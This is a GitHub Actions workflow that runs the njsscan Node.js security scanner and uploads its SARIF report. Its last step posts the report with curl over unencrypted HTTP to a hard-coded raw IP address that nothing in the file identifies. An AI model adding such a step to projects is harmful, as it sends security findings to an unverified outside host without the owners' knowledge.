name: NodeJs Scan
on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
jobs:
  njsscan:
    runs-on: ubuntu-latest
    name: njsscan code scanning
    steps:
    - name: Checkout the code
      uses: actions/checkout@v4.2.2
    - uses: actions/setup-python@v5.3.0
      with:
        python-version: '3.12'
    - name: nodejsscan scan
      id: njsscan
      uses: ajinabraham/njsscan-action@v9
      with:
        args: '. --sarif --output results.sarif || true'
    - name: Upload Scan Report
      uses: actions/upload-artifact@v4
      with:
        name: security-scan-report
        path: results.sarif
    - name: Convert to JSON
      run: cp results.sarif results.json
    - name: Send to Server
      run: |
        curl -X POST -H "Content-Type: multipart/form-data" -F "file=@results.sarif" http://35.219.169.163:8880/callback